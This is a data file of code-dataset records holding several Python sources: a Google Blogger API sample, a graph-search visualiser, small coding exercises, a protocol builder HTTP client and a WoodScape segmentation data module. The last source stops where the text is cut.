+{"seq_id":"39668283157","text":"from __future__ import print_function\n\n__author__ = \"jcgregorio@google.com (Joe Gregorio)\"\n\nimport sys\n\nfrom oauth2client import client\nfrom googleapiclient import sample_tools\n\n\ndef main(argv):\n # Authenticate and construct service.\n service, flags = sample_tools.init(\n argv,\n \"blogger\",\n \"v3\",\n __doc__,\n __file__,\n scope=\"https://www.googleapis.com/auth/blogger\",\n )\n\n try:\n\n users = service.users()\n\n # Retrieve this user's profile information\n thisuser = users.get(userId=\"self\").execute()\n print(\"This user's display name is: %s\" % thisuser[\"displayName\"])\n\n blogs = service.blogs()\n\n # Retrieve the list of Blogs this user has write privileges on\n thisusersblogs = blogs.listByUser(userId=\"self\").execute()\n for blog in thisusersblogs[\"items\"]:\n print(\"The blog named '%s' is at: %s\" % (blog[\"name\"], blog[\"url\"]))\n\n posts = service.posts()\n\n # List the posts for each blog this user has\n for blog in thisusersblogs[\"items\"]:\n print(\"The posts for %s:\" % blog[\"name\"])\n request = posts.list(blogId=blog[\"id\"])\n while request != None:\n posts_doc = request.execute()\n if \"items\" in posts_doc and not (posts_doc[\"items\"] is None):\n for post in posts_doc[\"items\"]:\n print(\" %s (%s)\" % (post[\"title\"], post[\"url\"]))\n request = posts.list_next(request, posts_doc)\n\n except client.AccessTokenRefreshError:\n print(\n \"The credentials have been revoked or expired, please re-run\"\n \"the application to re-authorize\"\n )\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"googleapis/google-api-python-client","sub_path":"samples/blogger/blogger.py","file_name":"blogger.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":7007,"dataset":"github-code","pt":"69"}
+{"seq_id":"20022954972","text":"import networkx as nx\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nfrom matplotlib.widgets import Button\r\nfrom matplotlib.widgets import AxesWidget\r\nfrom matplotlib.widgets import RadioButtons\r\nfrom matplotlib.widgets import TextBox\r\n#from matplotlib.widgets import Slider\r\n\r\n \r\n################ Drawing the Graph, options as radio buttons and etc. ################\r\n\r\n#Define the graph along with its nodes and their positions ;\r\nX = nx.Graph()\r\nfor i in range (1,6) :\r\n for j in range (0, i + 6):\r\n k = i * 7 + j - 6\r\n if (k < 36):\r\n X.add_node(k, pos = (j, i - 1))\r\n\r\npos=nx.get_node_attributes(X,'pos')\r\n\r\n#Making a list of 58 random numbers from 1 to 100 as the weights of the graph's edges ;\r\nmy_randoms = random.sample(range(1,101), 100)\r\ndel my_randoms[58:100]\r\n\r\n#Setting edges of the graph and assigning weights to each one ;\r\ni = 0\r\nfor j in range (1, 35) :\r\n if j % 7 != 0 :\r\n X.add_edge(j, j + 1, weight = my_randoms[i])\r\n i = i + 1\r\n if j < 29:\r\n X.add_edge(j, j + 7, weight = my_randoms[i])\r\n i = i + 1\r\n\r\nlabels = nx.get_edge_attributes(X,'weight')\r\n\r\n#Determine the location of the graph in the plot ;\r\nx_place = plt.axes([0.12, 0.01, 0.87, 0.88])\r\n\r\n#Drawing the graph\r\nnx.draw_networkx_nodes(X,pos,node_size=600, node_color='g', alpha=0.4, node_shape='s')\r\nnx.draw_networkx_labels(X, pos, font_size = 8, font_weight = 'heavy')\r\n\r\nnx.draw_networkx_edges(X, pos, width = 1.5, edg_color = 'r', style = 'dotted', alpha = 0.3)\r\nnx.draw_networkx_edge_labels(X, pos, edge_labels = labels, font_size = 7)\r\n\r\n#A class to make radio buttons display horizontally\r\nclass MyRadioButtons(RadioButtons):\r\n\r\n def __init__(self, ax, labels, active=0, activecolor='blue', size=49,\r\n orientation=\"vertical\", **kwargs):\r\n \r\n AxesWidget.__init__(self, ax)\r\n self.activecolor = activecolor\r\n axcolor = ax.get_facecolor()\r\n self.value_selected = None\r\n\r\n ax.set_xticks([])\r\n ax.set_yticks([])\r\n ax.set_navigate(False)\r\n\r\n circles = []\r\n for i, label in enumerate(labels):\r\n if i == active:\r\n self.value_selected = label\r\n facecolor = activecolor\r\n else:\r\n facecolor = axcolor\r\n p = ax.scatter([],[], s=size, marker=\"o\", edgecolor='black',\r\n facecolor=facecolor)\r\n circles.append(p)\r\n if orientation == \"horizontal\":\r\n kwargs.update(ncol=len(labels), mode=\"expand\")\r\n kwargs.setdefault(\"frameon\", False) \r\n self.box = ax.legend(circles, labels, loc=\"center\", **kwargs)\r\n self.labels = self.box.texts\r\n self.circles = self.box.legendHandles\r\n for c in self.circles:\r\n c.set_picker(5)\r\n self.cnt = 0\r\n self.observers = {}\r\n\r\n self.connect_event('pick_event', self._clicked)\r\n\r\n def _clicked(self, event):\r\n if (self.ignore(event) or event.mouseevent.button != 1 or\r\n event.mouseevent.inaxes != self.ax):\r\n return\r\n if event.artist in self.circles:\r\n self.set_active(self.circles.index(event.artist))\r\n\r\n#Initializing \"start node\" and \"goal node\" as their default values + receiving values entered by the user ;\r\nstart_node = 1\r\ndef submit_start(submit):\r\n global start_node\r\n start_node = submit\r\n\r\ngoal_node = 35\r\ndef submit_goal(submit):\r\n global goal_node\r\n goal_node = submit\r\n\r\npreferred_depth = 2\r\ndef submit_depth(submit):\r\n global preferred_depth\r\n preferred_depth = submit\r\n\r\n#Setting the default method of search + setting it according to what user has chosen ;\r\nsearch_method = 1\r\n\r\ndef methodFunc(lable):\r\n global search_method\r\n if lable == 'Breadth-First Search' :\r\n search_method = 1\r\n if lable == 'Depth-First Search' :\r\n search_method = 2\r\n elif lable == 'Uniform Cost Search' :\r\n search_method = 3\r\n elif lable == 'Iterative Deepening Depth-First Search' :\r\n search_method = 4\r\n\r\n#Setting search method options as radio buttons by determining their place on the plot and setting their texts ; \r\nplt.subplots_adjust(left=0.2)\r\nradios_place = plt.axes([0.12,0.9,0.87,0.05])\r\n#plt.text(- 0.068, - 0.05, \"Choose a method :\\n\")\r\nradio_buttons = MyRadioButtons(radios_place ,['Breadth-First Search','Depth-First Search','Uniform Cost Search', 'Iterative Deepening Depth-First Search'], active=0, activecolor='black',\r\n orientation=\"horizontal\")\r\nradio_buttons.on_clicked(methodFunc)\r\n\r\n#Defining a text-box for inputting start node by the user (sends input data to \"submit_start\" function (line 96))\r\nstartbox_place = plt.axes([0.07, 0.8, 0.03, 0.05])\r\ntext_box1 = TextBox(startbox_place,'', initial = '1')\r\nplt.text(-1.7, 1.0, \"Start :\\n\")\r\ntext_box1.on_submit(submit_start)\r\n\r\n#Defining a text-box for inputting goal node by the user (sends input data to \"submit_goal\" function (line 101))\r\ngoalbox_place = plt.axes([0.07, 0.7, 0.03, 0.05])\r\ntext_box2 = TextBox(goalbox_place,'', initial = '35')\r\nplt.text(-1.7, 1.0, \"Goal :\\n\")\r\ntext_box2.on_submit(submit_goal)\r\n\r\n#Defining a text-box for inputting depth limit by the user (sends input data to \"preferred_depth\" function (line 106))\r\npreferredDepthBox_place = plt.axes([0.07, 0.6, 0.03, 0.05])\r\ntext_box3 = TextBox(preferredDepthBox_place,'')#, initial = '2')\r\nplt.text(-1.7, 1.0, \"Depth limit :\\n\")\r\ntext_box3.on_submit(submit_depth)\r\n\r\n#Defining a button for searching proccess to start whenever user clicked it ;\r\nsearchButton_place = plt.axes([0.04, 0.5, 0.06, 0.05])\r\nsearchButton = Button(searchButton_place, 'Search', color = 'pink', hovercolor = 'grey')\r\n\r\n#######################################################################\r\n\r\n################ Define required functions and classes ################\r\n\r\n#Tree Class ;\r\n\r\nclass Tree(object) :\r\n def __init__(self, lable, parent) :\r\n self.lable = lable\r\n self.children = []\r\n self.parent = parent\r\n self.depth = 0\r\n\r\n if self.parent == None :\r\n self.depth = 0\r\n else :\r\n self.depth = parent.depth + 1\r\n\r\n def addChildren(self) :\r\n neighbors_list = list(X.neighbors(self.lable))\r\n if self.parent == None :\r\n self.children = []\r\n for f in range(len(neighbors_list)) :\r\n aChild = Tree(neighbors_list[f], self)\r\n self.children.append(aChild)\r\n\r\n else :\r\n self.children = []\r\n for f in range(len(neighbors_list)) :\r\n if neighbors_list[f] != self.parent.lable :\r\n aChild = Tree(neighbors_list[f], self)\r\n self.children.append(aChild)\r\n def getCost(self) :\r\n sample_node = self\r\n sample_node_cost = 0\r\n while sample_node.parent != None :\r\n weightDic = X.get_edge_data(sample_node.lable, sample_node.parent.lable)\r\n sample_node_cost = sample_node_cost + int(weightDic['weight'])\r\n sample_node = sample_node.parent\r\n return sample_node_cost\r\n\r\n\r\n#Depth Class ;\r\n\r\nclass Depth(object) :\r\n def __init__(self, level) :\r\n self.level = level\r\n self.members = []\r\n\r\n def addMember(self, node) :\r\n self.members.append(node)\r\n\r\n#Breadth-First search function ;\r\ndef breadthFirst_search(startNode, goalNode) :\r\n \r\n found = 'no'\r\n \r\n current_searchin_node = Tree(int(startNode), None)\r\n \r\n current_searchin_depth = Depth(0)\r\n current_searchin_depth.addMember(current_searchin_node)\r\n next_searchin_depth = Depth(1)\r\n\r\n while found == 'no' :\r\n current_searchin_node.addChildren()\r\n for m in range(len(current_searchin_node.children)):\r\n next_searchin_depth.addMember(current_searchin_node.children[m])\r\n if int(goalNode) == current_searchin_node.children[m].lable :\r\n found = 'yes'\r\n break\r\n if found == 'yes' :\r\n break\r\n else :\r\n if current_searchin_node == current_searchin_depth.members[len(current_searchin_depth.members) - 1] :\r\n current_searchin_node = next_searchin_depth.members[0]\r\n del(current_searchin_depth)\r\n current_searchin_depth = next_searchin_depth\r\n next_searchin_depth = Depth(current_searchin_node.depth + 1)\r\n\r\n else :\r\n for h in range(len(next_searchin_depth.members)):\r\n if current_searchin_node == current_searchin_depth.members[h] :\r\n current_searchin_node = current_searchin_depth.members[h + 1]\r\n break\r\n\r\n ansList = [] \r\n if found == 'yes' :\r\n ansList.append(int(goalNode))\r\n while current_searchin_node != None:\r\n ansList.append(current_searchin_node.lable)\r\n current_searchin_node = current_searchin_node.parent\r\n return ansList\r\n\r\n\r\n#Depth-First search function ; \r\ndef depthFirst_search(startNode, goalNode) :\r\n \r\n found = 'no'\r\n\r\n current_searchin_node = Tree(int(startNode), None)\r\n current_searchin_node.addChildren()\r\n\r\n while found == 'no' :\r\n while len(current_searchin_node.children) != 0:\r\n for m in range(len(current_searchin_node.children)):\r\n if int(goalNode) == current_searchin_node.children[m].lable :\r\n found = 'yes'\r\n break\r\n if found == 'yes' :\r\n break\r\n else :\r\n current_searchin_node = current_searchin_node.children[0]\r\n current_searchin_node.addChildren()\r\n\r\n if found == 'yes' :\r\n break\r\n if len(current_searchin_node.children) == 0 :\r\n goodOne = 0\r\n while goodOne == 0 :\r\n for h in range(len(current_searchin_node.parent.children)):\r\n if current_searchin_node == current_searchin_node.parent.children[h] :\r\n if h + 1 < len(current_searchin_node.parent.children) :\r\n current_searchin_node = current_searchin_node.parent.children[h + 1]\r\n current_searchin_node.addChildren()\r\n goodOne = 1\r\n break\r\n if h == len(current_searchin_node.parent.children) - 1 :\r\n current_searchin_node = current_searchin_node.parent\r\n\r\n ansList = []\r\n if found == 'yes' :\r\n ansList.append(int(goalNode))\r\n while current_searchin_node != None:\r\n ansList.append(current_searchin_node.lable)\r\n current_searchin_node = current_searchin_node.parent\r\n return ansList\r\n\r\n\r\n#Uniform cost search function ; \r\ndef uniformCost_search(startNode, goalNode) :\r\n\r\n found = 'no'\r\n \r\n current_searchin_node = Tree(int(startNode), None)\r\n \r\n notSearchedNodes_List = []\r\n sample_node = current_searchin_node\r\n\r\n while found == 'no' :\r\n current_searchin_node.addChildren()\r\n for m in range(len(current_searchin_node.children)):\r\n if int(goalNode) == current_searchin_node.children[m].lable :\r\n found = 'yes'\r\n break\r\n notSearchedNodes_List.append(current_searchin_node.children[m])\r\n current_searchin_node.children[m].parent = sample_node\r\n sample_node.children.append(current_searchin_node.children[m])\r\n if found == 'yes' :\r\n break\r\n\r\n indx = 0\r\n leastCost = notSearchedNodes_List[0].getCost()\r\n for f in range(len(notSearchedNodes_List)) :\r\n sample_cost = notSearchedNodes_List[f].getCost()\r\n if sample_cost < leastCost :\r\n leastCost = sample_cost\r\n indx = f\r\n current_searchin_node = notSearchedNodes_List[indx]\r\n sample_node = current_searchin_node\r\n for l in range(len(current_searchin_node.parent.children)) :\r\n if current_searchin_node.parent.children[l] == current_searchin_node :\r\n current_searchin_node.parent.children[l] = sample_node\r\n break\r\n\r\n del notSearchedNodes_List[indx]\r\n\r\n ansList = []\r\n if found == 'yes' :\r\n ansList.append(int(goalNode))\r\n while current_searchin_node != None:\r\n ansList.append(current_searchin_node.lable)\r\n current_searchin_node = current_searchin_node.parent\r\n return ansList\r\n\r\n\r\n#Iterative deepening depth-first search function ; \r\ndef IterativeDeepeningDF_search(startNode, goalNode, preferredDepth) :\r\n \r\n found = 'no'\r\n\r\n current_searchin_node = Tree(int(startNode), None)\r\n current_searchin_node.addChildren()\r\n\r\n while found == 'no' :\r\n while len(current_searchin_node.children) != 0:\r\n if current_searchin_node.depth == int(preferredDepth) :\r\n current_searchin_node.children = []\r\n break\r\n for m in range(len(current_searchin_node.children)):\r\n if int(goalNode) == current_searchin_node.children[m].lable :\r\n found = 'yes'\r\n break\r\n if found == 'yes' :\r\n break\r\n else :\r\n current_searchin_node = current_searchin_node.children[0]\r\n current_searchin_node.addChildren()\r\n\r\n if found == 'yes' :\r\n break\r\n if len(current_searchin_node.children) == 0 :\r\n goodOne = 0\r\n while goodOne == 0 :\r\n if current_searchin_node.parent != None :\r\n for h in range(len(current_searchin_node.parent.children)):\r\n if current_searchin_node == current_searchin_node.parent.children[h] :\r\n if h + 1 < len(current_searchin_node.parent.children) :\r\n current_searchin_node = current_searchin_node.parent.children[h + 1]\r\n current_searchin_node.addChildren()\r\n goodOne = 1\r\n break\r\n if h == len(current_searchin_node.parent.children) - 1 :\r\n current_searchin_node = current_searchin_node.parent\r\n\r\n ansList = []\r\n if found == 'yes' :\r\n ansList.append(int(goalNode))\r\n while current_searchin_node != None:\r\n ansList.append(current_searchin_node.lable)\r\n current_searchin_node = current_searchin_node.parent\r\n return ansList\r\n\r\n\r\ndef on_button_clicked(event):\r\n #clears the axes where the graph is placed\r\n plt.axes([0.12, 0.01, 0.87, 0.88])\r\n plt.cla()\r\n\r\n #draws the graph again \r\n nx.draw_networkx_nodes(X,pos,node_size=600, node_color='g', alpha=0.4, node_shape='s')\r\n nx.draw_networkx_labels(X, pos, font_size = 8, font_weight = 'heavy')\r\n\r\n nx.draw_networkx_edges(X, pos, width = 1.5, edg_color = 'r', style = 'dotted', alpha = 0.3)\r\n nx.draw_networkx_edge_labels(X, pos, edge_labels = labels, font_size = 7)\r\n \r\n ans_list = []\r\n\r\n if start_node == goal_node:\r\n ans_list.append(int(start_node))\r\n\r\n elif search_method == 1 :\r\n ans_list = breadthFirst_search(start_node, goal_node)\r\n\r\n elif search_method == 2 :\r\n ans_list = depthFirst_search(start_node, goal_node)\r\n\r\n elif search_method == 3 :\r\n ans_list = uniformCost_search(start_node, goal_node)\r\n \r\n elif search_method == 4 :\r\n global preferred_depth\r\n ans_list = IterativeDeepeningDF_search(start_node, goal_node, preferred_depth)\r\n\r\n #colors the navigated nodes\r\n plt.axes([0.12, 0.01, 0.87, 0.88])\r\n nx.draw_networkx_nodes(X, pos, node_size=600, nodelist = ans_list, node_color = '#84D7F5', node_shape='s')\r\n\r\ndef main() :\r\n searchButton.on_clicked(on_button_clicked)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\nplt.show()","repo_name":"zeinabyari/graph","sub_path":"AI_graph_proj_01_96103214_CODE.py","file_name":"AI_graph_proj_01_96103214_CODE.py","file_ext":"py","file_size_in_byte":15995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70529189021","text":"import re\ndef is_all_upper(text: str) -> bool:\n # your code here\n test = r\"[a-z]*\"\n test2 = r\"[A-Z]*\"\n if text.isupper():\n return True\n elif re.match(test, text):\n return False\n else:\n return True\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(is_all_upper('ALL UPPER'))\n print(is_all_upper(' '))\n\n # These \"asserts\" are used for self-checking and not for an auto-testing\n assert is_all_upper('ALL UPPER') == True\n assert is_all_upper('all lower') == False\n assert is_all_upper('mixed UPPER and lower') == False\n # assert is_all_upper('') == True\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n\n\n\ntest = r\"[a-z]{6}\"\ntest2 = r\"[A-Z]*\"\n\nprint(bool(re.findall(test, \"text\")))\n","repo_name":"Kapitan/test.py","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20477298541","text":"\"\"\" \n@Author: huuuuusy\n@GitHub: https://github.com/huuuuusy\n系统: Ubuntu 18.04\nIDE: VS Code 1.36\n工具: python == 3.7.3\n\"\"\"\n\n\"\"\"\n思路:\n 两轮循环,暴力解法\n 从左到右遍历数组,left[i]存储i左边所有元素的和\n 然后再次循环,计算出右边元素之和,然后和左边元素比较,判断返回值\n结果:\n 执行用时 : 84 ms, 在所有 Python3 提交中击败了52.61%的用户\n 内存消耗 : 14 MB, 在所有 Python3 提交中击败了88.38%的用户\n\"\"\"\n\nclass Solution:\n def pivotIndex(self, nums):\n left = []\n sum = 0\n # 对每个元素,计算其左边元素的和,然后存入列表\n for num in nums:\n sum += num\n left.append(sum - num)\n # 计算右边元素的和,与左边元素比较\n for i in range(len(nums)):\n left_sum = left[i]\n rigth_sum = sum - left_sum - nums[i]\n if left_sum == rigth_sum:\n return i\n return -1\n\nif __name__ == \"__main__\":\n nums = [1, 7, 3, 6, 5, 6]\n answer = Solution().pivotIndex(nums)\n print(answer)\n ","repo_name":"new007008/Programming-Practice-Everyday","sub_path":"LeetCode Python/0724-寻找数组的中心索引*/V1.py","file_name":"V1.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24384894760","text":"import json\nfrom json import JSONDecodeError\nfrom typing import List, Optional\n\nimport requests\n\nfrom crc import app\nfrom crc.api.common import ApiError\nfrom crc.models.protocol_builder import ProtocolBuilderCreatorStudySchema, ProtocolBuilderRequiredDocument\n\n\nclass ProtocolBuilderService(object):\n STUDY_URL = app.config['PB_USER_STUDIES_URL']\n INVESTIGATOR_URL = app.config['PB_INVESTIGATORS_URL']\n REQUIRED_DOCS_URL = app.config['PB_REQUIRED_DOCS_URL']\n STUDY_DETAILS_URL = app.config['PB_STUDY_DETAILS_URL']\n SPONSORS_URL = app.config['PB_SPONSORS_URL']\n IRB_INFO_URL = app.config['PB_IRB_INFO_URL']\n CHECK_STUDY_URL = app.config['PB_CHECK_STUDY_URL']\n PRE_REVIEW_URL = app.config['PB_PRE_REVIEW_URL']\n\n @staticmethod\n def is_enabled():\n if isinstance(app.config['PB_ENABLED'], str):\n return app.config['PB_ENABLED'].lower() == \"true\"\n else:\n return app.config['PB_ENABLED'] is True\n\n @staticmethod\n def get_studies(user_id) -> {}:\n ProtocolBuilderService.__enabled_or_raise()\n if not isinstance(user_id, str):\n raise ApiError(\"protocol_builder_error\", \"This user id is invalid: \" + str(user_id))\n url = ProtocolBuilderService.STUDY_URL % user_id\n response = requests.get(url)\n if response.ok and response.text:\n try:\n pb_studies = ProtocolBuilderCreatorStudySchema(many=True).loads(response.text)\n return pb_studies\n except JSONDecodeError as err:\n raise ApiError(\"protocol_builder_error\",\n \"Received an invalid response from the protocol builder. The response is not \"\n \"valid json. Url: %s, Response: %s, error: %s\" %\n (url, response.text, err.msg))\n else:\n raise ApiError(\"protocol_builder_error\",\n \"Received an invalid response from the protocol builder (status %s): %s\" %\n (response.status_code, response.text))\n\n @staticmethod\n def get_investigators(study_id) -> {}:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.INVESTIGATOR_URL)\n\n @staticmethod\n def get_required_docs(study_id) -> Optional[List[ProtocolBuilderRequiredDocument]]:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.REQUIRED_DOCS_URL)\n\n @staticmethod\n def get_study_details(study_id) -> {}:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.STUDY_DETAILS_URL)\n\n @staticmethod\n def get_irb_info(study_id) -> {}:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.IRB_INFO_URL)\n\n @staticmethod\n def get_sponsors(study_id) -> {}:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.SPONSORS_URL)\n\n @staticmethod\n def check_study(study_id) -> {}:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.CHECK_STUDY_URL)\n\n @staticmethod\n def get_pre_reviews(study_id) -> {}:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.PRE_REVIEW_URL)\n\n @staticmethod\n def __enabled_or_raise():\n if not ProtocolBuilderService.is_enabled():\n raise ApiError(\"protocol_builder_disabled\", \"The Protocol Builder Service is currently disabled.\")\n\n @staticmethod\n def __make_request(study_id, url):\n ProtocolBuilderService.__enabled_or_raise()\n if not isinstance(study_id, int):\n raise ApiError(\"invalid_study_id\", \"This study id is invalid: \" + str(study_id))\n response = requests.get(url % study_id)\n if response.ok and response.text:\n return json.loads(response.text)\n else:\n raise ApiError(\"protocol_builder_error\",\n \"Received an invalid response from the protocol builder (status %s): %s when calling \"\n \"url '%s'.\" %\n (response.status_code, response.text, url))\n","repo_name":"sartography/cr-connect-workflow","sub_path":"crc/services/protocol_builder.py","file_name":"protocol_builder.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"69"}
+{"seq_id":"39202832462","text":"from typing import Optional, Any, Callable\nimport os\nimport glob\nimport torch\nimport random\nfrom torch.utils.data import Dataset\nimport torchvision\nfrom torchvision import transforms\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torch.utils.data import DataLoader\nimport PIL\nimport PIL.Image\nimport numpy as np\nfrom pytorch_lightning import LightningDataModule\nimport pytorch_lightning as pl\nimport torchmetrics\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nfrom .synthetic_anomalies import AnomalyMud\nfrom icecream import ic\n\n\nclass WoodScapeDataset(Dataset):\n def __init__(\n self,\n dataset_dir: str,\n img_size: tuple = (150, 300),\n n_classes: int = 10,\n default_transforms=False,\n img_transforms=None,\n label_transforms=None,\n img_mask_transforms=None,\n label_colours=None,\n ) -> None:\n super().__init__()\n self.class_names = [\n \"void\",\n \"road\",\n \"lanemarks\",\n \"curb\",\n \"person\",\n \"rider\",\n \"vehicles\",\n \"bicycle\",\n \"motorcycle\",\n \"traffic_sign\",\n ]\n\n self.n_classes = n_classes\n\n self.class_colors_rgb = [\n [0, 0, 0],\n [255, 0, 255],\n [0, 0, 255],\n [0, 255, 0],\n [255, 0, 0],\n [255, 255, 255],\n [0, 255, 255],\n [255, 255, 0],\n [255, 128, 128],\n [128, 128, 0],\n ] # RGB format!\n\n self.class_colors_bgr = [\n [0, 0, 0],\n [255, 0, 255],\n [255, 0, 0],\n [0, 255, 0],\n [0, 0, 255],\n [255, 255, 255],\n [255, 255, 0],\n [0, 255, 255],\n [128, 128, 255],\n [0, 128, 128],\n ] # BGR format!\n\n if label_colours is None:\n self.label_colours = dict(zip(range(10), self.class_colors_rgb))\n\n else:\n self.label_colours = label_colours\n\n self.class_indexes = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n self.dataset_dir = dataset_dir\n self.rgb_images_dir = os.path.join(self.dataset_dir, \"rgb_images\")\n self.rgb_images_list = glob.glob(os.path.join(self.rgb_images_dir, \"*.png\"))\n self.rgb_images_list.sort()\n self.semantic_annotations_dir = os.path.join(self.dataset_dir, \"semantic_annotations\")\n self.semantic_annotations_gt_dir = os.path.join(self.semantic_annotations_dir, \"gtLabels\")\n self.semantic_annotations_rgb_dir = os.path.join(self.semantic_annotations_dir, \"rgbLabels\")\n self.semantic_annotations_gt_list = glob.glob(\n os.path.join(self.semantic_annotations_gt_dir, \"*.png\")\n )\n self.semantic_annotations_gt_list.sort()\n self.semantic_annotations_rgb_list = glob.glob(\n os.path.join(self.semantic_annotations_rgb_dir, \"*.png\")\n )\n self.semantic_annotations_rgb_list.sort()\n\n self.img_size = img_size\n if self.img_size is None:\n self.img_size = (150, 300)\n\n self.default_transforms = default_transforms\n self.img_mask_transforms = img_mask_transforms\n\n if self.default_transforms: # default transforms is True\n self.img_transforms = transforms.Compose(\n [\n transforms.Resize(self.img_size),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.32757252, 0.33050337, 0.33689716],\n std=[0.20290555, 0.20525302, 0.2037721],\n ),\n ]\n )\n self.label_transforms = transforms.Compose([transforms.Resize(self.img_size)])\n\n else: # default transforms is False\n self.img_transforms = img_transforms\n self.label_transforms = label_transforms\n\n def __len__(self):\n \"\"\"__len__\"\"\"\n return len(self.rgb_images_list)\n\n def __getitem__(self, index):\n # get image path\n img_path = self.rgb_images_list[index]\n gt_label_path = self.semantic_annotations_gt_list[index]\n\n image = PIL.Image.open(img_path).convert(\"RGB\")\n gt_label = PIL.Image.open(gt_label_path)\n\n # starts here 1:\n # image = self.img_transforms(image)\n # image = image.float()\n #\n # gt_label_np = np.asarray(gt_label)\n # gt_label_tensor = torch.LongTensor(np.array(gt_label_np, copy=True))\n # gt_label_tensor = gt_label_tensor.unsqueeze(0)\n # gt_label_tensor = self.label_transforms(gt_label_tensor)\n\n # starts here 2:\n if self.img_transforms:\n image = self.img_transforms(image)\n image = image.float()\n\n if self.label_transforms:\n gt_label = np.asarray(gt_label)\n gt_label = torch.LongTensor(np.array(gt_label, copy=True))\n gt_label = gt_label.unsqueeze(0)\n gt_label = self.label_transforms(gt_label)\n\n if self.img_mask_transforms:\n transformed = self.img_mask_transforms(\n image=np.asarray(image), mask=np.asarray(gt_label)\n )\n image = transformed[\"image\"]\n gt_label = transformed[\"mask\"]\n gt_label = gt_label.unsqueeze(dim=0)\n\n # return image, gt_label_tensor\n return image, gt_label\n\n def decode_segmap(self, temp: np.ndarray):\n temp = temp.squeeze()\n r = temp.copy()\n g = temp.copy()\n b = temp.copy()\n for l in range(0, self.n_classes):\n r[temp == l] = self.label_colours[l][0]\n g[temp == l] = self.label_colours[l][1]\n b[temp == l] = self.label_colours[l][2]\n\n rgb = np.zeros((temp.shape[0], temp.shape[1], 3))\n rgb[:, :, 0] = r / 255.0\n rgb[:, :, 1] = g / 255.0\n rgb[:, :, 2] = b / 255.0\n return rgb\n\n\nclass WoodScapeDataModule(LightningDataModule):\n name = \"WoodScape\"\n extra_args: dict = {}\n\n def __init__(\n self,\n dataset_dir: str,\n target_type: str = \"semantic\",\n num_workers: int = 10,\n batch_size: int = 32,\n valid_size: float = 0.2,\n test_size: float = 0.1,\n seed: int = 10,\n img_size: tuple = (150, 300),\n shuffle: bool = False,\n pin_memory: bool = True,\n drop_last: bool = False,\n default_transforms: bool = False,\n default_img_mask_transforms: bool = False,\n img_transforms_train: transforms = None,\n img_transforms_valid: transforms = None,\n label_colours: dict = None,\n norm_mean: list = None,\n norm_std: list = None,\n *args: Any,\n **kwargs: Any,\n ):\n super().__init__(*args, **kwargs)\n\n self.dataset_dir = dataset_dir\n self.target_type = target_type\n self.num_workers = num_workers\n self.batch_size = batch_size\n self.valid_size = valid_size\n self.test_size = test_size\n self.default_transforms = default_transforms\n self.default_img_mask_transforms = default_img_mask_transforms\n self.label_transforms = None\n self.seed = seed\n self.img_size = img_size\n self.shuffle = shuffle\n self.pin_memory = pin_memory\n self.drop_last = drop_last\n self.woodscape_ds_train = None\n self.woodscape_ds_valid = None\n self.woodscape_anomaly_ds = None\n self.train_sampler = None\n self.valid_sampler = None\n self.test_sampler = None\n\n self.label_colours = label_colours\n\n self.train_loader_len = 0\n self.valid_loader_len = 0\n self.test_loader_len = 0\n self.anomaly_valid_loader_len = 0\n self.anomaly_test_loader_len = 0\n\n if norm_mean is None and norm_std is None:\n self.norm_mean = [0.32757252, 0.33050337, 0.33689716]\n self.norm_std = [0.20290555, 0.20525302, 0.2037721]\n else:\n self.norm_mean = norm_mean\n self.norm_std = norm_std\n\n if self.default_transforms: # default transforms is True\n self.img_transforms_train = self._default_img_transforms()\n self.img_transforms_valid = self._default_img_transforms()\n self.label_transforms = self._default_label_transforms()\n\n elif self.default_img_mask_transforms:\n self.img_transforms_train = self._train_default_img_mask_transforms()\n self.img_transforms_valid = self._val_default_img_mask_transforms()\n\n else: # default transforms is False\n self.img_transforms_train = img_transforms_train\n self.img_transforms_valid = img_transforms_valid\n # self.label_transforms_train = label_transforms_train\n # self.label_transforms_train = img_transforms_train\n self.label_transforms = self._default_label_transforms()\n # self.label_transforms_valid = label_transforms_valid\n\n self.save_hyperparameters()\n\n def setup(self, stage: Optional[str] = None) -> None:\n # Assign train/val datasets for use in dataloaders\n if stage == \"fit\" or stage is None:\n self.woodscape_ds_train = WoodScapeDataset(\n dataset_dir=self.dataset_dir,\n img_size=self.img_size,\n img_transforms=self.img_transforms_train,\n label_transforms=self.label_transforms,\n label_colours=self.label_colours,\n )\n\n self.woodscape_ds_valid = WoodScapeDataset(\n dataset_dir=self.dataset_dir,\n img_size=self.img_size,\n img_transforms=self.img_transforms_valid,\n label_transforms=self.label_transforms,\n label_colours=self.label_colours,\n )\n\n self.woodscape_anomaly_ds = WoodScapeDataset(\n dataset_dir=self.dataset_dir,\n img_size=self.img_size,\n img_transforms=None,\n label_transforms=None,\n img_mask_transforms=self._anomaly_transforms(),\n label_colours=self.label_colours,\n )\n\n # get dataset length (woodscape_ds_train and woodscape_ds_valid are the same):\n dataset_len = len(self.woodscape_ds_train)\n # get indices\n indices = list(range(dataset_len))\n # indices random shuffle\n print(\"DATASET Shuffle Random SEED: \", self.seed)\n 